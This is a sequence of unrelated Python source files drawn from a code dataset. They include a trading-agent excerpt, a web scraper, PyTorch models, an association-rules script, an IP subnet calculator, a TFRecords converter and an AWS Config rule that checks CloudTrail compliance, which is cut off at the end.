self.portfolio.getReturnsPercent(self.env.getCurrentPrice())\n self.test_cum_returns.append(cum_return)\n \n portfolio_value = self.portfolio.getCurrentValue(self.env.getCurrentPrice())\n self.test_portfolio_values.append(portfolio_value)\n \n self.test_actions.append(action.value)\n \n verbose = verbose_g\n \n if isDone:\n break\n \n ts = self.env.df.ix[start_time:end_time].index\n self.test_cum_returns = pd.Series(self.test_cum_returns, index=ts)\n self.test_portfolio_values = pd.Series(self.test_portfolio_values, index=ts)\n self.test_actions = pd.Series(self.test_actions, index=ts)\n\n print('Percentage return:', self.portfolio.getReturnsPercent(self.env.getCurrentPrice()))\n \n def plot_action(self, start_time, end_time=None):\n import matplotlib.pyplot as plt\n \n if end_time is None: # default: one day\n end_time = start_time + self.env.time_delta * 24\n \n df = self.env.df\n df = df.loc[df.index >= start_time]\n df = df.loc[df.index <= end_time]\n prices = df['USDT_BTC_open']\n \n actions = self.test_actions\n actions = actions[actions.index >= start_time]\n actions = actions[actions.index < end_time]\n \n fig, ax1 = plt.subplots(figsize = (15, 8))\n \n ax1.plot(prices.index, prices, 'b-')\n ax1.set_ylabel('Price', color='b', fontsize=15)\n ax1.tick_params('y', colors='b', labelsize=15)\n \n hold = actions[actions == 1]\n buy = actions[actions == 2]\n sell = actions[actions == 0]\n \n ax2 = ax1.twinx()\n ax2.scatter(hold.index, hold, c='blue', label='HOLD')\n ax2.scatter(buy.index, buy, c='green', label='BUY')\n ax2.scatter(sell.index, sell, c='red', label='SELL')\n ax2.set_yticks([])\n ax2.legend(loc=1, fontsize=15)\n\n plt.xlim(actions.index[0], actions.index[-1]) \n\n plt.show()\n \n def plot_env(self, states_to_plot=None, start_time=None, end_time=None):\n self.env.plot(states_to_plot, start_time, end_time)\n \n def plot_portfolio(self, states_to_plot=None, start_time=None, end_time=None):\n self.portfolio.plot(states_to_plot, start_time, end_time)","sub_path":"Trading/RL/MintDQNAgent.py","file_name":"MintDQNAgent.py","file_ext":"py","file_size_in_byte":17400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"426139929","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nimport os\n\nfrom scraper.models_old import Movie\nfrom datetime import datetime\n\n\npath_module = os.path.dirname(os.path.abspath(__file__))\npath_chromedriver = os.path.join(path_module, 'chromedriver2.44.exe')\n\n\ndef get_movies_info(infos, session):\n \"\"\"\n parses movie information (title, genre, start_date) from a list\n of Tag div (class='product-info')\n\n :param infos: list of bs4.element.Tag('div') containing movie info\n :return:\n \"\"\"\n for info in infos:\n title = info.h2.string\n print(title)\n spans = info(name='span', class_='cgv-info-normal')\n # stripping whitespaces from beginning and end of result\n genre = spans[0].get_text(strip=True)\n start_date = spans[2].get_text(strip=True)\n start_date = datetime.strptime(start_date, '%d-%m-%Y').date() # convert to date obj\n # create record\n movie = Movie(title=title, genre=genre, start_date=start_date)\n session.add(movie)\n print('--------------')\n\n\ndef get_browser():\n # add args to tell Selenium to not actually open a window\n chrome_options = Options()\n chrome_options.add_argument('--headless')\n chrome_options.add_argument('--window-size=1920x1080')\n # open browser\n browser = webdriver.Chrome(executable_path=path_chromedriver,\n chrome_options=chrome_options)\n return browser\n\n\n","sub_path":"scraper/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"152755823","text":"\n\ndef weight_on_planets():\n # takes weight as float variable\n weight = float(input(\"What do you weigh on earth? \"))\n #calculates and prints weight for Mars and Jupiter\n print(\"\\nOn Mars you would weigh \" + str(weight * .38) + \" pounds.\\nOn Jupiter you would weigh \" + str(weight * 2.34) + \" pounds.\")\n\nif __name__ == '__main__':\n weight_on_planets()","sub_path":"lab0-willski23/planets.py","file_name":"planets.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"172648895","text":"import torch.nn as nn\nimport torch.nn.functional as F\n\nclass MLP(nn.Module):\n\tdef __init__(self, in_dim, out_dim, numlayer, numunit):\n\t\tsuper(MLP, self).__init__()\n\t\tin_sizes = [in_dim] + [numunit] * (numlayer - 1)\n\t\tout_sizes = [numunit] * numlayer\n\t\tself.layers = nn.ModuleList(\n\t\t\t[nn.Linear(in_size, out_size) for (in_size, out_size)\n\t\t\tin zip(in_sizes, out_sizes)])\n\t\tself.last_linear = nn.Linear(numunit, out_dim)\n\t\n\tdef forward(self, x):\n\t\tfor layer in self.layers:\n\t\t\tx = F.relu(layer(x))\n\t\tx = self.last_linear(x)\n\t\treturn x\n\nclass CNN(nn.Module):\n\tdef __init__(self, filtersize, stride, padsize, numchannel):\n\t\tsuper(CNN, self).__init__()\n\t\tself.layers = nn.ModuleList([ \\\n\t\t\tnn.Conv1d(in_channels=1, out_channels=numchannel, kernel_size=filtersize, stride=stride, padding=padsize), \\\n\t\t\tnn.Conv1d(in_channels=numchannel, out_channels=numchannel, kernel_size=filtersize, stride=stride, padding=padsize), \\\n\t\t\tnn.Conv1d(in_channels=numchannel, out_channels=numchannel, kernel_size=filtersize, stride=stride, padding=padsize), \\\n\t\t\tnn.Conv1d(in_channels=numchannel, out_channels=numchannel, kernel_size=filtersize, stride=stride, padding=padsize), \\\n\t\t\tnn.Conv1d(in_channels=numchannel, out_channels=numchannel, kernel_size=filtersize, stride=stride, padding=padsize), \\\n\t\t\tnn.Conv1d(in_channels=numchannel, out_channels=1, kernel_size=filtersize, stride=stride, padding=padsize) \\\n\t\t])\n\t\n\tdef forward(self, x):\n\t\tfor layer in self.layers:\n\t\t\tx = layer(x)\n\t\treturn x\n","sub_path":"06_speechparam_update/tool/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"263755506","text":"\r\nimport pandas as pd\r\nfrom mlxtend.frequent_patterns import association_rules, apriori\r\n\r\ndata=pd.read_excel(Clustering_train.xlsx)\r\n\r\nimport Transformation\r\nencode=Transformation.transformation(trans,'InvoiceNo','Description')\r\n\r\nfrequent_itemsets = apriori(encode, min_support = 0.01, max_len = 2, use_colnames=True)\r\n # compute all association rules for frequent_itemsets\r\nAssociation_rule=association_rules(frequent_itemsets, metric=\"lift\", min_threshold=1)\r\n\r\n\r\nAssociation_rule['Antecedent_new'] = Association_rule.antecedents.map(lambda x : list(x)[0])\r\nAssociation_rule['Consequents_new'] = Association_rule.consequents.map(lambda x : list(x)[0])\r\n\r\nFinal_Rule=Association_rule[['Antecedent_new','Consequents_new','support','confidence','lift']].sort_values('lift', axis=0, ascending=False)\r\n\r\n","sub_path":"Apriori.py","file_name":"Apriori.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"596914698","text":"import time,sys\nfrom tqdm import tqdm\nfrom time import sleep\ndef process_Shape():\n\tprint('正在下载...')\n\tfor i in range(11):\n\t\tif i!=10:\n\t\t\tsys.stdout.write('==')\n\t\telse:\n\t\t\tsys.stdout.write('=='+str(i*10)+'%')\n\t\tsys.stdout.flush()\n\t\ttime.sleep(0.5)\n\tprint('\\n下载成功')\n\n\ndef shape():\n\tfor i in tqdm(range(10)):\n\t\tsleep(0.5)\n\t\n\n\n\nif __name__ == '__main__':\n\tprocess_Shape()\n\tshape()","sub_path":"process_shape.py","file_name":"process_shape.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"234774895","text":"from orthogonalization import orthogonalize, aug_orthogonalize\nfrom vec import Vec\nfrom matutil import coldict2mat, mat2rowdict\nfrom math import sqrt\n\ndef normalize(v):\n '''\n Input: A Vector v will be normalized\n Output: A Vector v be normalized\n '''\n return v/sqrt(v*v)\n\ndef orthonormalize(L):\n '''\n Input: a list L of linearly independent Vecs\n Output: A list T of orthonormal Vecs such that for all i in [1, len(L)],\n Span L[:i] == Span T[:i]\n '''\n return [normalize(v) for v in orthogonalize(L)]\n\ndef djust(v, multipliers):\n '''\n input: a Vec with domain {0, 1, 2, . . . , n − 1} and an n-element list multipliers of scalars\n output: a Vec w with the same domain as v such that w[i] = multipliers[i]*v[i]\n '''\n return Vec(v.D, {i:multipliers[i]*v[i] for i in v.D})\n\ndef aug_orthonormalize(L):\n '''\n Input:\n - L: a list of Vecs\n Output:\n - A pair Qlist, Rlist such that:\n * coldict2mat(L) == coldict2mat(Qlist) * coldict2mat(Rlist)\n * Qlist = orthonormalize(L)\n '''\n Qlist = list()\n Rlist = list()\n normlist = list()\n vstarlist, sigma_vecs = aug_orthogonalize(L)\n\n for vstar,sigma_vec in zip(vstarlist,sigma_vecs):\n q = normalize(vstar)\n normlist.append(sqrt(vstar*vstar))\n Qlist.append(q)\n Rlist.append(sigma_vec)\n\n for r in range(len(Rlist)):\n for k in Rlist[r].D:\n Rlist[r][k] = normlist[k] * Rlist[r][k]\n return (Qlist, Rlist)\n\n","sub_path":"orthonormalization.py","file_name":"orthonormalization.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"593512887","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport glob\nimport tensorflow as tf\nimport numpy as np\nfrom tqdm import tqdm\nfrom torchvision import transforms\nimport torch\nfrom gen_tfrecords.BIWI import BIWI\n\ndef _int64_feature(value):\n return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))\n\ndef _bytes_feature(value):\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))\n\ndef _floats_feature(value):\n return tf.train.Feature(float_list=tf.train.FloatList(value=[value]))\n\ndef convert_to(images, labels_yaw, labels_pitch, labels_roll,\n labels_yaw_cont, labels_pitch_cont, labels_roll_cont, genders, identities,\n name, directory):\n if images.shape[0] != labels_yaw.shape[0]:\n raise ValueError('Images size %d does not match labels size %d.' %\n (images.shape[0], labels_yaw.shape[0]))\n num_examples = images.shape[0]\n height = images.shape[1]\n width = images.shape[2]\n nchannel = images.shape[3]\n\n filename = os.path.join(directory, '{}.tfrecords'.format(name))\n print('Writing', filename)\n writer = tf.python_io.TFRecordWriter(filename)\n for index in range(num_examples):\n image_raw = images[index].astype(np.float32).tostring()\n label_yaw = labels_yaw[index].astype(np.float32)\n label_pitch = labels_pitch[index].astype(np.float32)\n label_roll = labels_roll[index].astype(np.float32)\n label_yaw_cont = labels_yaw_cont[index].astype(np.float32)\n label_pitch_cont = labels_pitch_cont[index].astype(np.float32)\n label_roll_cont = labels_roll_cont[index].astype(np.float32)\n gender = genders[index].astype(np.int32)\n identity = identities[index].astype(np.int32)\n example = tf.train.Example(features=tf.train.Features(feature={\n 'height': _int64_feature(height),\n 'width': _int64_feature(width),\n 'nchannel': _int64_feature(nchannel),\n 'label_yaw_raw': _floats_feature(label_yaw),\n 'label_pitch_raw': _floats_feature(label_pitch),\n 'label_roll_raw': _floats_feature(label_roll),\n 'label_yaw_cont_raw': _floats_feature(label_yaw_cont),\n 'label_pitch_cont_raw': _floats_feature(label_pitch_cont),\n 'label_roll_cont_raw': _floats_feature(label_roll_cont),\n 'gender': _int64_feature(gender),\n 'identity': _int64_feature(identity),\n 'image_raw': _bytes_feature(image_raw)\n }))\n writer.write(example.SerializeToString())\n writer.close()\n\nif __name__ == \"__main__\":\n #transformations = transforms.Compose([transforms.Scale(240),\n #transforms.RandomCrop(224), transforms.ToTensor(),\n #transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])])\n transformations = transforms.Compose([transforms.Scale(240), transforms.CenterCrop(224), transforms.ToTensor()])\n\n pose_dataset = BIWI('/home/wuzhenyu_sjtu/deep-head-pose/BIWI/hpdb',\n '/home/wuzhenyu_sjtu/deep-head-pose/BIWI/test_filename_list', transformations)\n\n train_loader = torch.utils.data.DataLoader(dataset=pose_dataset, batch_size=1, shuffle=True,\n drop_last=False, num_workers=1)\n\n arr_image, arr_label_yaw, arr_label_pitch, arr_label_roll = [], [], [], []\n arr_label_yaw_cont, arr_label_pitch_cont, arr_label_roll_cont = [], [], []\n arr_gender, arr_identity = [], []\n for i, (images, labels, cont_labels, gender, identity) in enumerate(train_loader):\n images = np.transpose(images.cpu().numpy(), [0, 2, 3, 1])\n labels = labels.cpu().numpy()\n cont_labels = cont_labels.cpu().numpy()\n gender = gender.cpu().numpy()\n identity = identity.cpu().numpy()\n\n # Binned labels\n label_yaw = labels[:, 0][0]\n label_pitch = labels[:, 1][0]\n label_roll = labels[:, 2][0]\n\n # Continuous labels\n label_yaw_cont = cont_labels[:, 0][0]\n label_pitch_cont = cont_labels[:, 1][0]\n label_roll_cont = cont_labels[:, 2][0]\n #print(label_yaw, label_pitch, label_roll)\n #print(label_yaw_cont, label_pitch_cont, label_roll_cont)\n #print(label_yaw.shape, label_pitch.shape, label_roll.shape)\n #print(label_yaw_cont.shape, label_pitch_cont.shape, label_roll_cont.shape)\n #print(images)\n print('Sample [%d/%d] ' % (i + 1, len(pose_dataset)))\n\n arr_image.append(np.squeeze(images))\n arr_label_yaw.append(np.asscalar(label_yaw))\n arr_label_pitch.append(np.asscalar(label_pitch))\n arr_label_roll.append(np.asscalar(label_roll))\n arr_label_yaw_cont.append(np.asscalar(label_yaw_cont))\n arr_label_pitch_cont.append(np.asscalar(label_pitch_cont))\n arr_label_roll_cont.append(np.asscalar(label_roll_cont))\n arr_gender.append(np.asscalar(gender[:, 0]))\n arr_identity.append(np.asscalar(identity[:, 0]))\n #print(arr_gender)\n #print(arr_identity)\n if (i+1) % 1000 == 0:\n convert_to(np.asarray(arr_image), np.asarray(arr_label_yaw), np.asarray(arr_label_pitch), np.asarray(arr_label_roll),\n np.asarray(arr_label_yaw_cont), np.asarray(arr_label_pitch_cont), np.asarray(arr_label_roll_cont),\n np.asarray(arr_gender), np.asarray(arr_identity),\n name='testing_{}'.format(i), directory='tfrecords')\n arr_image, arr_label_yaw, arr_label_pitch, arr_label_roll = [], [], [], []\n arr_label_yaw_cont, arr_label_pitch_cont, arr_label_roll_cont = [], [], []\n arr_gender, arr_identity = [], []\n convert_to(np.asarray(arr_image), np.asarray(arr_label_yaw), np.asarray(arr_label_pitch), np.asarray(arr_label_roll),\n np.asarray(arr_label_yaw_cont), np.asarray(arr_label_pitch_cont), np.asarray(arr_label_roll_cont),\n np.asarray(arr_gender), np.asarray(arr_identity),\n name='testing_{}'.format(len(pose_dataset)), directory='tfrecords')","sub_path":"legacy/AFLW/gen_tfrecords/convert2records_BIWI.py","file_name":"convert2records_BIWI.py","file_ext":"py","file_size_in_byte":6133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"638783728","text":"import socket\r\nimport sys\r\nimport ipaddress\r\nimport re\r\nimport json\r\nfrom socket import inet_ntoa\r\nfrom struct import pack\r\ndef change_to_int(adres):\r\n\ta,b,c,d = adres.split(\".\")\r\n\ta = int(a)\r\n\tb = int(b)\r\n\tc = int(c)\r\n\td = int(d)\r\n\tip = [a,b,c,d]\r\n\treturn ip\r\ndef format_validator (adres):\r\n\tmatch = re.search(r'^\\d{1,}.\\d{1,}.\\d{1,}.\\d{1,}/\\d{1,}$', adres)\r\n\tif(match):\r\n\t\treturn True\r\n\telse:\r\n\t\treturn False\r\n\t\t\r\ndef address_validator (adres, maska):\r\n\tzwracane = True\r\n\tadres = change_to_int(adres)\r\n\tmaska = int(maska)\r\n\tif(adres[0] >=0 and adres[0] <=255 and adres[1]>=0 and adres[1]<=255 and adres[2]>=0 and adres[2]<=255 and adres[3]>=0\\\r\n\tand adres[3]<=255 and maska >=0 and maska <=32):\r\n\t\treturn True\r\n\telse:\r\n\t\treturn False\r\n\t\t\r\ndef cidr_mask(cidr):\r\n\tcidr = int(cidr)\r\n\tmask = (0xffffffff >> (32 - cidr)) << (32 - cidr)\r\n\treturn (str( (0xff000000 & mask) >> 24) + '.' +\r\n str( (0x00ff0000 & mask) >> 16) + '.' +\r\n str( (0x0000ff00 & mask) >> 8) + '.' +\r\n str( (0x000000ff & mask)))\r\n\t\t\r\ndef adres_sieci(adres,cidr):\r\n\tmaska = cidr_mask(cidr)\r\n\tadres = change_to_int(adres)\r\n\tmaska = change_to_int(maska)\r\n\tx = [adres[0]&maska[0], adres[1]&maska[1], adres[2]&maska[2], adres[3]&maska[3]]\r\n\treturn (\"{}.{}.{}.{}/{}\".format(x[0],x[1],x[2],x[3],cidr))\r\n\t\r\ndef klasa_sieci(adres):\r\n\ta = adres.split(\".\")\r\n\ta = int(a[0])\r\n\t\r\n\tif(a >= 1 and a <= 127):\r\n\t\treturn \"A\"\r\n\telif (a >=128 and a<=191):\r\n\t\treturn \"B\"\r\n\telif (a >=192 and a<=223):\r\n\t\treturn \"C\"\r\n\telif (a >=224 and a<=239):\r\n\t\treturn \"D\"\r\n\telse:\r\n\t\treturn \"E\"\r\n\t\r\ndef binary_address(adres):\r\n\tadres = change_to_int(adres)\r\n\treturn (\"{}.{}.{}.{}\".format(bin(adres[0])[2:].zfill(8),bin(adres[1])[2:].zfill(8),bin(adres[2])[2:].zfill(8),bin(adres[3])[2:].zfill(8)))\r\n\r\ndef broadcast_address(adres, maska):\r\n\t\r\n\tadres = change_to_int(adres)\r\n\tmaska = change_to_int(maska)\r\n\tbroadcast = [int(bin(a | ~b), 2) & 0xff for a, b in zip(adres, maska)]\r\n\treturn (\"{}.{}.{}.{}\".format(broadcast[0],broadcast[1],broadcast[2],broadcast[3]))\r\n\t\r\ndef host_min(adres): \t#adres sieci\r\n\t\r\n\thost_min, maska = adres.split(\"/\")\r\n\thost_min = host_min.split(\".\")\r\n\thost_min[3] = str(int(host_min[3])+1)\r\n\t\r\n\treturn (\"{}.{}.{}.{}\".format(host_min[0],host_min[1],host_min[2],host_min[3]))\r\n\r\ndef host_max(adres):\t#adres broadcast\r\n\thost_min = adres.split(\".\")\r\n\thost_min[3] = str(int(host_min[3])-1)\r\n\treturn (\"{}.{}.{}.{}\".format(host_min[0],host_min[1],host_min[2],host_min[3]))\r\n\t\r\ndef host_length(maska):\r\n\tliczba = pow(2, 32-int(maska)) -2\r\n\tif(liczba < 0):\r\n\t\tliczba = 0\r\n\treturn liczba\r\n\t\r\nwarunek = True\r\nif (len(sys.argv) > 1):\r\n\tcalosc = sys.argv[1]\r\n\tif (format_validator(calosc)):\r\n\t\tadres, maska = calosc.split(\"/\")\t\t\t\r\n\t\tif not (address_validator(adres, maska)):\r\n\t\t\twarunek = False\r\n\telse:\r\n\t\twarunek = False\r\nelse:\r\n\tadres = socket.gethostbyname(socket.gethostname())\r\n\tadres = ipaddress.ip_network(adres)\r\n\tadres,maska = str(adres).split(\"/\")\r\n\r\nif(warunek):\r\n\r\n\tmaska_dziesietnie = cidr_mask(maska)\r\n\tadres_sieci = adres_sieci(adres,maska)\r\n\tklasa_sieci = klasa_sieci(adres)\r\n\tmaska_binarnie = binary_address(maska_dziesietnie)\r\n\tbroadcast_address = broadcast_address(adres,maska_dziesietnie)\r\n\tbroadcast_address_binarnie = binary_address(broadcast_address)\r\n\thost_min = host_min(adres_sieci)\r\n\thost_min_binarnie = binary_address(host_min)\r\n\thost_max = host_max(broadcast_address)\r\n\thost_max_binarnie = binary_address(host_max)\r\n\thost_length = host_length(maska)\r\n\thost_length_binarnie = bin(int(host_length))[2:].zfill(8)\r\n\tif(int(maska) > 30):\r\n\t\thost_min = \"brak\"\r\n\t\thost_min_binarnie =\"brak\"\r\n\t\thost_max = \"brak\"\r\n\t\thost_max_binarnie = \"brak\"\r\n\t\thost_length = \"punkt-punkt\"\r\n\t\thost_length_binarnie = \"punkt-punkt\"\r\n\tif(int(maska) == 32):\r\n\t\tadres_sieci = \"brak\"\r\n\t\tklasa_sieci = \"brak\"\r\n\t\tbroadcast_address = \"brak\"\r\n\t\tbroadcast_address_binarnie = \"brak\"\r\n\t\thost_length = \"to jest pojedynczy host, nie siec\"\r\n\t\thost_length_binarnie = \"to jest pojedyczny host, nie siec\"\r\n\tprint(\"Adres sieci: {0} \".format(adres_sieci))\r\n\tprint(\"Klasa sieci: {0} \".format(klasa_sieci))\r\n\tprint(\"Maska binarnie: {0} \".format(maska_binarnie))\r\n\tprint(\"Maska dziesietnie: {0} \".format(maska_dziesietnie))\r\n\tprint(\"Broadcast binarnie: {0} \".format(broadcast_address_binarnie))\r\n\tprint(\"Broadcast dziesietnie: {0} \".format(broadcast_address))\r\n\tprint(\"Host min binarnie: {0} \".format(host_min_binarnie))\r\n\tprint(\"Host min dziesietnie: {0} \".format(host_min))\r\n\tprint(\"Host max binarnie: {0} \".format(host_max_binarnie))\r\n\tprint(\"Host max dziesietnie: {0} \".format(host_max))\r\n\tprint(\"Ilosc hostow binarnie: {0} \".format(host_length_binarnie))\r\n\tprint(\"Ilosc hostow dziesietnie: {0} \".format(host_length))\r\n\tdata = {}\r\n\tdata['adres'] = []\r\n\tdata['adres'].append({\r\n\t\t'adres sieci' : adres_sieci,\r\n\t\t'klasa sieci' : klasa_sieci,\r\n\t\t'maska sieci binarnie' : maska_binarnie,\r\n\t\t'maska sieci dziesietnie' : maska_dziesietnie,\r\n\t\t'adres broadcast binarnie' : broadcast_address_binarnie,\r\n\t\t'adres broadcast dziesietnie' : broadcast_address,\r\n\t\t'min adres hosta binarnie' : host_min_binarnie,\r\n\t\t'min adres hosta dziesietnie' : host_min,\r\n\t\t'max adres hosta binarnie' : host_max_binarnie,\r\n\t\t'max adres hosta dziesietnie' : host_max,\r\n\t\t'ilosc hostow binarnie' : host_length_binarnie,\r\n\t\t'ilosc hostow dziesietnie' : host_length\r\n\t})\r\n\twith open('data.json', 'w') as outfile:\r\n\t\r\n\t\tjson.dump(data, outfile)\r\nelse:\r\n\tprint(\"Wprowadzono niepoprawny adres\")\r\n","sub_path":"SimpleIPCalculator/source.py","file_name":"source.py","file_ext":"py","file_size_in_byte":5430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"611034338","text":"#\n# Copyright 2017-2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\").\n# You may not use this file except in compliance with the License.\n# A copy of the License is located at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# or in the \"license\" file accompanying this file. This file is distributed \n# on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either \n# express or implied. See the License for the specific language governing \n# permissions and limitations under the License.\n#\n\n#\n# Detective Controls\n# cloudtrail_centralized_encrypted_lfi\n#\n\nimport json\nimport boto3\nimport sys\nimport time\nimport re\nfrom datetime import datetime\n\n#############################################\n# Parameters to modify for your environment #\n#############################################\n\n## Specify the bucket name where at least 1 AWS CloudTrail should be centralized, ideally in a centralized Logging AWS Account. \nAWS_CLOUDTRAIL_NAME = 'Security_Trail_DO-NOT-MODIFY'\nAWS_CLOUDTRAIL_S3_BUCKET_NAME = ''\nAWS_CLOUDTRAIL_KMS_KEY_ARN = ''\n\n########\n# Code #\n########\n\ndef cloudtrail_centralized_encrypted_lfi(event):\n # This rule verifies that a defined CloudTrail Trail send all logs to centralized S3 bucket.\n #\n # Scope\n # This rule covers one particular trail and is triggered periodically.\n #\n # Prerequisites \n # Configure the following in the code of this lambda function\n # 1) AWS_CLOUDTRAIL_NAME [Name of the Trail to look for]\n # 2) AWS_CLOUDTRAIL_S3_BUCKET_NAME [Name of the S3 bucket, ideally in the centralized Security Logging Account]\n # 3) AWS_CLOUDTRAIL_KMS_KEY_ARN [KMS CMK ARN used to encrypt CloudTrail, ideally in the centralized Security Logging Account]\n #\n # Use cases\n # The following logic is applied: \n # No Trail is configured -> NOT COMPLIANT\n # No Trail named AWS_CLOUDTRAIL_NAME value is configured -> NOT COMPLIANT\n # The Trail named AWS_CLOUDTRAIL_NAME value is inactive -> NOT COMPLIANT\n # The Trail named AWS_CLOUDTRAIL_NAME value is not including global resources -> NOT COMPLIANT\n # The Trail named AWS_CLOUDTRAIL_NAME value is not multi-region -> NOT COMPLIANT\n # The Trail named AWS_CLOUDTRAIL_NAME value has no Log File Integrity -> NOT COMPLIANT\n # The Trail named AWS_CLOUDTRAIL_NAME value is not logging all Management Events -> NOT COMPLIANT\n # The Trail named AWS_CLOUDTRAIL_NAME value is not logging all S3 Data Events -> NOT COMPLIANT\n # AWS_CLOUDTRAIL_S3_BUCKET_NAME is not defined -> NOT COMPLIANT\n # The Trail named AWS_CLOUDTRAIL_NAME value is not logging in AWS_CLOUDTRAIL_S3_BUCKET_NAME -> NOT COMPLIANT\n # AWS_CLOUDTRAIL_KMS_KEY_ARN is not defined -> NOT COMPLIANT\n # The Trail named AWS_CLOUDTRAIL_NAME value is not encrypted -> NOT COMPLIANT\n # The Trail named AWS_CLOUDTRAIL_NAME value is not encrypted using AWS_CLOUDTRAIL_KMS_KEY_ARN -> NOT COMPLIANT\n # The Trail named AWS_CLOUDTRAIL_NAME value is active, global, log file integrity, logging in AWS_CLOUDTRAIL_S3_BUCKET_NAME and encrypted with AWS_CLOUDTRAIL_KMS_KEY_ARN -> COMPLIANT\n\n cloudtrail_client = STS_SESSION.client(\"cloudtrail\") \n \n eval = {}\n eval[\"Configuration\"] = cloudtrail_client.describe_trails()['trailList']\n print(eval)\n\n if len(eval['Configuration']) == 0:\n response= {\n \"ComplianceType\": \"NON_COMPLIANT\",\n \"Annotation\": \"No Trail is configured.\"\n }\n else:\n trail_found = False\n\n for trail in eval['Configuration']:\n if trail[\"Name\"] == AWS_CLOUDTRAIL_NAME:\n trail_found = True\n if trail_found == False:\n response= {\n \"ComplianceType\": \"NON_COMPLIANT\",\n \"Annotation\": \"No Trail named \"+ AWS_CLOUDTRAIL_NAME +\" is configured.\"\n }\n else:\n correct_trail_status = cloudtrail_client.get_trail_status(Name=AWS_CLOUDTRAIL_NAME)\n correct_trail = cloudtrail_client.describe_trails(trailNameList=[AWS_CLOUDTRAIL_NAME])['trailList'][0]\n correct_trail_selector = cloudtrail_client.get_event_selectors(TrailName=AWS_CLOUDTRAIL_NAME)['EventSelectors'][0]\n print(correct_trail_selector)\n \n if correct_trail_status['IsLogging'] != True:\n response= {\n \"ComplianceType\": \"NON_COMPLIANT\",\n \"Annotation\": \"The Trail named \"+ AWS_CLOUDTRAIL_NAME +\" is not enabled.\"\n }\n if 'LatestDeliveryError' in correct_trail_status:\n response= {\n \"ComplianceType\": \"NON_COMPLIANT\",\n \"Annotation\": \"The Trail named \"+ AWS_CLOUDTRAIL_NAME +\" did not delivered the log as expected. The current error is \" + correct_trail_status['LatestDeliveryError'] + \". Contact the Security team.\"\n }\n elif correct_trail['IncludeGlobalServiceEvents'] != True:\n response= {\n \"ComplianceType\": \"NON_COMPLIANT\",\n \"Annotation\": \"The Trail named \"+ AWS_CLOUDTRAIL_NAME +\" is not logging global resources.\"\n }\n elif correct_trail['IsMultiRegionTrail'] != True:\n response= {\n \"ComplianceType\": \"NON_COMPLIANT\",\n \"Annotation\": \"The Trail named \"+ AWS_CLOUDTRAIL_NAME +\" is not logging in all regions.\"\n }\n elif correct_trail['LogFileValidationEnabled'] != True:\n response= {\n \"ComplianceType\": \"NON_COMPLIANT\",\n \"Annotation\": \"The Trail named \"+ AWS_CLOUDTRAIL_NAME +\" has not log file integrity enabled.\"\n }\n elif correct_trail_selector['ReadWriteType'] != 'All' or correct_trail_selector['IncludeManagementEvents'] != True:\n response= {\n \"ComplianceType\": \"NON_COMPLIANT\",\n \"Annotation\": \"The Trail named \"+ AWS_CLOUDTRAIL_NAME +\" does not log ALL Management events.\"\n }\n elif len(correct_trail_selector['DataResources'])==0 or str(correct_trail_selector['DataResources'][0]) != \"{'Type': 'AWS::S3::Object', 'Values': ['arn:aws:s3']}\":\n response= {\n \"ComplianceType\": \"NON_COMPLIANT\",\n \"Annotation\": \"The Trail named \"+ AWS_CLOUDTRAIL_NAME +\" does not log ALL S3 Data Events.\"\n }\n elif AWS_CLOUDTRAIL_S3_BUCKET_NAME == \"\":\n response= {\n \"ComplianceType\": \"NON_COMPLIANT\",\n \"Annotation\": \"The parameter \\\"AWS_CLOUDTRAIL_S3_BUCKET_NAME\\\" is not defined in the lambda code. Contact the Security team.\"\n } \n elif correct_trail['S3BucketName'] != AWS_CLOUDTRAIL_S3_BUCKET_NAME:\n response= {\n \"ComplianceType\": \"NON_COMPLIANT\",\n \"Annotation\": \"The Trail named \"+ AWS_CLOUDTRAIL_NAME +\" is not logging in the S3 bucket named \" + AWS_CLOUDTRAIL_S3_BUCKET_NAME + \".\"\n }\n elif AWS_CLOUDTRAIL_KMS_KEY_ARN == \"\":\n response= {\n \"ComplianceType\": \"NON_COMPLIANT\",\n \"Annotation\": \"The parameter \\\"AWS_CLOUDTRAIL_KMS_KEY_ARN\\\" is not defined in the lambda code. Contact the Security team.\"\n }\n elif 'KmsKeyId' not in correct_trail:\n response= {\n \"ComplianceType\": \"NON_COMPLIANT\",\n \"Annotation\": \"The Trail named \"+ AWS_CLOUDTRAIL_NAME +\" is not encrypted.\"\n } \n elif correct_trail['KmsKeyId'] != AWS_CLOUDTRAIL_KMS_KEY_ARN:\n response= {\n \"ComplianceType\": \"NON_COMPLIANT\",\n \"Annotation\": \"The Trail named \"+ AWS_CLOUDTRAIL_NAME +\" is not encrypted using \" + AWS_CLOUDTRAIL_KMS_KEY_ARN + \".\"\n }\n else:\n response = {\n \"ComplianceType\": \"COMPLIANT\",\n \"Annotation\": \"The Trail named \"+ AWS_CLOUDTRAIL_NAME +\" is active and well defined to send logs to 